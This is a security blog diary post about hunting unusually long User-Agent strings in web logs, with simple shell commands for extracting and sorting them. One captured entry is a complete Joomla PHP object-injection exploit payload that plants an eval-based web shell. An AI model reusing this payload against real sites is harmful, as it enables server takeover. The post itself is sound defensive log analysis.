from SANS Internet Storm Center, InfoCON: green
When looking at my web logs, I am always out to hunt for anomalies. Today, after seeing some odd and long user agents, I figured it would be fun to look for the longest once that I can find in my logs. First of all: how?
Fist, I am extracting the User Agent string from my web server access log:
cut -f 6 -d'"' access_log > /tmp/useragents (this may look different for you if you use a different log format)
Next, sorting the result by line length:
cat /tmp/useragents | awk '{ print length, $0 }' | sort -n -s | cut -d" " -f2- | uniq
So finally some of the "winners"
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 OWASMIME/4.0500 (...) OWASMIME/4.0500 is repeated many times. No idea what this is about. A buggy script?
}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;
O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;
a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;
O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;
s:254:\x22file_put_contents($_SERVER[\x22DOCUMENT_ROOT\x22].chr(47).\x22images\x22.
chr(47).\x22main.php\x22,\x22|=|\x5Cx3C\x22.chr(63).\x22php \x5Cx24mujj=\x5Cx24_POST['@123'];if(\x5Cx24mujj!='')
{\x5Cx24xsser=base64_decode(\x5Cx24_POST['z0']);
@eval(\x5C\x22\x5C\x5C\x5Cx24safedg=\x5Cx24xsser;\x5C\x22);}\x22);
JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;
s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;
O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}~\xD9
An exploit for an OLD Joomla issue if I remember right? This stuff still works?
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0; GWX:MANAGED; GWX:DOWNLOADED; GWX:QUALIFIED; InfoPath.3; MALCJS; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; ms-office; MSOffice 15)
Again. Lots of duplicate content. Do you REALLY have to tell me what version of Outlook you are running? I know you are proud of your tablet...
Oddly enough, no shell shock today.
What is your longest User-Agent if you search your weblogs?
